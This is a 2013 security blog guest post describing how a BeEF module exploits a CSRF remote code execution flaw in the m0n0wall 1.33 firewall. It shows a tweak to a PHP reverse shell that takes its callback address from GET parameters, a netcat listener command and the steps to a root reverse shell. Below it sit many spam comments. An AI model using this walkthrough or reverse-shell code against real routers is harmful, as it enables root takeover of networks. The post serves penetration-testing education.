Wednesday, March 20, 2013

Exploiting m0n0wall 1.33 with BeEF

Today's post is a guest post from Bart Leppens.

What is m0n0wall? m0n0wall is a free software firewall distribution that often runs on embedded hardware like Alixor Soekris boards.  It is based on a bare-bones version of FreeBSD. There is no netcat, socat, perl, python, ruby or even telnet present on the system.  I actually don't know if this is due to security considerations or just to save some diskspace since m0n0wall was longtime fitting on a 8 MB CF-card, now it requires just a 16 MB card. And we figured out how to exploit it with BeEF.

The Proof of Concept:
In November of 2012, Yann Cam, Security Consultant at synetis, released a Cross-Site Request Forgery Remote Code Execution Proof of Concept for m0n0wall 1.33 which allows an attacker to spawn a reverse shell with root privileges.

On the website of m0n0wall is posted the following newsitem:

m0n0wall Vulnerability Announcement

Oh my, CSRF RCE with root privileges on a router is considered a low priority security fix nowadays...

Anyway, to obtain his root shell, Yann Cam made use of Pentest Monkey's php-reverse-shell.  We at BeEF-project decided to contact Pentest Monkey and asked him if we were allowed to tweak his awesome php reverse shell just a tiny bit so we could use it with an automatic module for Yann's exploit.

So I basically just changed this:

$ip = '';  // CHANGE THIS
$port = 1234;       // CHANGE THIS

into this:

$ip = $_GET["ip"];  //retrieve ip address to connect back to via HTTP GET
if (!$ip) {
    $ip = '';  // or set static ip address
$port = $_GET["port"];  //retrieve port to connect back to via HTTP GET
 if (!$port) {
     $port = 1234;  // or define port here

Then I just implemented the actual BeEF-module based on the provided proof of concept so m0n0wall 1.33 can be easily exploited.

What happens behind the scenes?
  1. The victim needs to have a valid m0n0wall-session for the CSRF to work.
  2. An attacker needs to listen on some port (lport) at a certain IP address (lhost)  (e.g.: nc -l -p 4444).
  3. The attacker fills in the parameters in BeEF and sends the exploit http://lhost:lport/exec_raw.php
  4. The file php-reverse-shell.php gets served by BeEF.
  5. A new file x.php is created on the victims machine and given proper execute rights (chmod 755).
  6. After a little bit, http://lhost:lport/x.php?ip=<rhost>&port=<rport> is triggered.
  7. The remotely served file http://beefhost:beefport/php-reverse-shell.php get's eval'ed (For it to work, make sure you have configured your public host in BeEF's config.yaml. Otherwise, your IP might be known as and it won't work.)
  8. The m0n0wall machine spawns back a reverse shell to specified lhost and lport.
  9. Finally, BeEF stops serving the php-reverse-shell.php.


So even with only the php interpreter present on the system, it can still be possible to send a reverse shell without the need to compile code or to execute shellcode.  By using creative solutions like
Pentest Monkey's php-reverse shell, you still can easily exploit the remote system.

Bart Leppens has a master degree in Informatics. He has over 10 years of experience in IT, mainly in software development. He reported security bugs in widely used products from major vendors. At the moment, he is working as a Project Manager for the Belgian government at the department of Finances. During his spare time he likes to contribute to the BeEF-project. You can reach him via twitter: @bmantra


  1. Just deploying an important massage:
    while installing the BeEF exactly as shown I encountered an error in the "Bundle Install".

    Bundler::GemSpecError: Could not read gem at /home//.rvm/gems/ruby-1.9.2-p290-rub/cache/librex-0.0.68.gem. It may be corrupted.
    An error occurred while installing librex (0.0.68), and Bundler cannot continue.
    Make sure that 'gem install librex -v '0.0.68'' succeeds before bundling.

    When I tried running the BeEF i got:
    Could not find gem 'twitter (>= 0) ruby' in the gems available on this machine.
    Run 'bundle install' to install missing gems.

    OK so now for the solution that took me a few Google hours:

    The problem seems to stop the gem installation and the 'twitter gem' is next after librex. that's why the error on exec in 'twitter gem' related.

    The error is reffering to the ruby's cache directory:
    "Could not read gem at /home//.rvm/gems/ruby-1.9.2-p290-rub/CACHE/librex-0.0.68.gem. It may be corrupted."

    So all you need to do is delete the cache directory by:
    user@ubuntu: rm -r cache
    user@ubuntu: bundle install

    Enjoy BeEF!

  2. This comment has been removed by the author.


  3. Thanks for posting this useful content, Good to know about new things here, Let me share this, . Hadoop training in pune

  4. A whole age is coming up absolutely subject to an advanced cell. Sentence structure has lost all significance to pay for research paper, and spell check is popular.

  5. add local printer windows 10 in Windows 10 is usually a simple 10-minute process, after which you can start printing right away. Here's how to add a printer in Windows.

  6. My recommendation is to also take a look at this web-page. I am sure you will find it useful.


  7. افضل شركات الاثاث المستعمل
    قد يحتاج البعض إلى شراء بعض قطع الأثاث اللازمة في المنزل لكن عند البحث في المحال التجارية يجدون أن الأسعار باهظة بشكل غير معقول لذلك قد يفكر الكثير من الأشخاص اللجوء إلى شراء الأثاث المستخدم والذي يكون في حالة جيدة لكن قد تنتابهم الحيرة في معرفة الشركة التي لا بد من التوجه إليها للبحث عن قطع الأثاث المناسبة ولماذا كل ذلك فكل ما عليك هو التواصل مع شركة شراء اثاث مستعمل والتي عادة ما توفر جميع قطع الأثاث التي يرغب في اقتنائها جميع العملاء مهما اختلفت طبقاتهم المجتمعية فجرب ذلك الأمر بنفسك ونعدك بأنك لن تندم أبداً على ذلك الاختيار.
    شراء الاثاث المستعمل بالدمام
    شراء اثاث مستعمل
    ارقام الاثاث المستعمل
    اتخاذ القرار الحاسم بالتوجه إلى جهة معينة لشراء الأثاث المستعمل منها أمر ليس سهل إطلاقاً لكن عندما يكون لديك خلفية معرفية عن كل شركة فهذا بالطبع سيساعدك على اختيار ما هو أفضل لك ولكل أفراد أسرتك لذلك فسنطلعك في النقاط التالية على أهم المميزات التي تمتلكها شركة شراء اثاث مستعمل وذلك لكي تطمئن في حالة التعامل معها:
    • توفير جميع أنواع الأثاث اللازم لكل منزل مثل غرف النوم وأطقم الصالونات والأنتريهات هذا بالإضافة إلى المجالس وغرف النوم الخاصة بالأطفال.
    • يوجد بشركتنا المتميزة العديد من أجهزة الحاسب الآلي وتتميز باختلاف أحجامها وأنواعها وأسعارها وهذا لكي تناسب جميع عملائنا الكرام.
    • إذا كنت تبحث عن شراء الأجهزة الكهربائية المنزلية مثل الثلاجات وأجهزة التكييف ففي شركتنا ستجد أنواع متميزة لا حصر لها يمكنك اختيار ما يحلو لك منها.
    • يمكنك من خلال شركتنا المتميزة شراء جميع أدوات المطبخ مثل غسالات الأطباق وأفران الميكروويف والأفران العادية.
    • لا تخشى عملية نقل الأثاث إلى منزلك حيث أن شركة شراء اثاث مستعمل توفر العديد من الشاحنات ذات الأحجام المختلفة لمساعدتك في نقل جميع الأثاث الذي قمت باختياره وشرائه إلى منزلك بشكل آمن.
    • خدمة العملاء التابعة لنا تعمل على مدار 24 ساعة وهذا لاستقبال جميع اتصالاتكم الهاتفية وكافة استفساراتكم.
    • يتم عرض جميع الأثاث المتوفر لدينا بشكل مرتب ومنظم هذا بالإضافة إلى أن أسعارنا لا يوجد لها منافس.

    شراء الاثاث المستعمل
    شراء اثاث
    حقين الاثاث المستعمل

  8. The latest Oracle 1Z0-968 Brain Dumps from valid4sure. Download 1Z0-968 pdf, Try it Free. Quickly and easily pass Oracle exam with 1z0-968 vce dumps

  9. The cash is accessible considerably speedier than it is with a bank credit. Unsecured trader loans are extraordinarily an extraordinary alternative for retail and eatery shippers, not just on the grounds that these kinds of organizations can barely be supported by the conventional bank, yet in addition on account of the quick liquidity and straightforward process.
    Cash Advances corona

  10. Good Post! Thank you so much for sharing this pretty post, it was so good to read and useful to improve my knowledge as updated one, keep blogging.

    Selenium with python Training in Electronic City

  11. Great post! I didn’t knowral of these resources and I’m going to go check them out now! twitch

  12. Readytricks provides Internet tricks, tips, How to Methods, Guides on Android, Windows, Mac tutorials and a lot more.

  13. Thanks for this wonderful article and continue sharing more topics like this router login

  14. Very helpful article, thank you for sharing this information! build royale

  15. You are so exellent. I'm your fan. I follow your post daily happy wheels

  16. I’m happy to found this informative blog, thank you so much for sharing with us. Get the most promising website designing services by ogen infosystem delhi.
    SEO Service in Delhi

  17. Nice blog, keet it up for more updates about this blog. Visit Mutual Fund Wala for the best Investment schemes and mutual fund companies.
    Investment Advisor in Delhi

  18. This is an well informative and useful stuff for us, I like your posts thank you so much for sharing this.
    Geomatics Assignment Help

  19. All of our buy custom research papers services will always be 100% unique and authentic work composed by an essayist on our writing team as plagiarism is a crucial area when it comes to seeking best online essay writing service in our firm.

  20. Our nursing essay writing service provides custom papers that will earn you the highest of grades because students can easily become frustrated trying to meet deadlines. Seek our best custom essay writing service today.

  21. Really very informative and creative. This sharing concept is a good way to enhance knowledge.

  22. HP2-H88 dumps - Recently updated HP2-H88 new updated questions are included today in our question bank. Download the latest HP HP2-H88 Question to ensure your success

  23. Getting reliable and competent Buy Custom Essay Services writing companies is no longer an easy task as most of the current providers are unreliable and provide poor Write my Essay Services that do not let students get high scores.

  24. I was very impressed about it, wish you would have stayed next share
    slope game

  25. Zong SMS Package keep you update about all
    telecom companies packages. You can find the packages of all companies with full detail and activation code.

  26. The termite control company in Riyadh, which deals with the termite insect, is trying to eliminate it. It is a species of insects with articulated legs that feed on cellulose. This material is found in many tools that are used by humans such as papers, carpets, rugs, clothes, curtains, mats, pillows, mattresses and many other pieces. Therefore, it is a very harmful type of insects that must be dealt with.
    شركة مكافحة حشرات بالطائف
    شركة رش مبيدات بالطائف
    ارخص شركة مكافحة حشرات
    شركة رش مبيدات بسكاكا

  27. Thanks a lot for the post. It has helped me get some nice ideas. I hope I will see some really good result soon.
    hotmail login

  28. Thanks for Nice and Informative Post. This article is really contains lot more information about This Topic gmail sign up

  29. Are you having issue while completing your programming assignments? Well, IdealAssignmentHelp will help you with your assignments and help you with the best of experience. My assignment help Australia experts will not only help you in getting your assignment covered in the given time period also without any kind of mistakes in it. So, get your complex programming assignment covered without having to stress about the quality anymore. You can reach out to online assignment help experts any time and we will never let you down in terms of quality and as well as rates! Get Connected now for top notch writing experience for excellent future ahead!

  30. Thank you so much for this amazing information sharing with us. Visit Appslure WebSolution for the best mobile app development company in Gurgaon
    Mobile app development company in gurgaon

  31. Nice, this is really amazing information. Kalakutir Pvt Ltd provides quality products in Delhi, India. We are providing the best quality Vinyl Signage Printing and Indoor & Outdoor Advertising in the Delhi area.
    Vinyl Signage Printing Services

  32. The 92nd Academy Awards will once again air on ABC on Sunday, Feb. 9, and the night is sure to be filled with glitz, glamour, and maybe even a few more upsets.
    <a href="></a>

  33. The 92nd Academy Awards will once again air on ABC on Sunday, Feb. 9, and the night is sure to be filled with glitz, glamour, and maybe even a few more upsets.
    <a href="></a>

  34. I read this article! I hope you will continue to have such articles to share with everyone! thank you! hotmail login


  35. If you want a babe from the house of Russian Call Girls in Mahipalpurthere are a few things you should know well before making a booking. Firstly our agency here at your city. In simple words is a cut above the rest because of the highly professional services we provide to our clients. Check our other Services...
    Russian Call Girls in Mahipalpur
    Russian Call Girls in Mahipalpur
    Russian Call Girls in Mahipalpur
    Russian Call Girls in Paharganj
    Russian Call Girls in Vasant Kunj

  36. Zong Internet Pacakges keep you update about all telecom companies packages.
    You can find the packages of all companies with full detail and activation code.

    Zong SMS Package: keep you update about all telecom companies packages.
    You can find the packages of all companies with full detail and activation code.

  37. Zong Call Package: keep you update about all telecom companies packages.
    You can find the packages of all companies with full detail and activation code.

  38. Nice! thank you so much! Thank you for sharing. Your blog posts are more interesting and informative

    Turbo VPN Pc

  39. We will discuss Mono wall which was an embedded firewall distribution of FreeBSD, one of the BSD operating system descendants. It provides a small image which can be put on Compact Flash cards as well as on CD-ROMs and hard disks. Coursework writing services.

  40. Krunker io is a great weapon game where you won't know how to lose ...

  41. If I had read your article earlier, it would have been different. My ideas will definitely become more complete if you add your comments. It's so wonderful web page


  42. Wonderful information! I found amazing information on the blogs i suggest everyone to follow the links below to get download files from this website.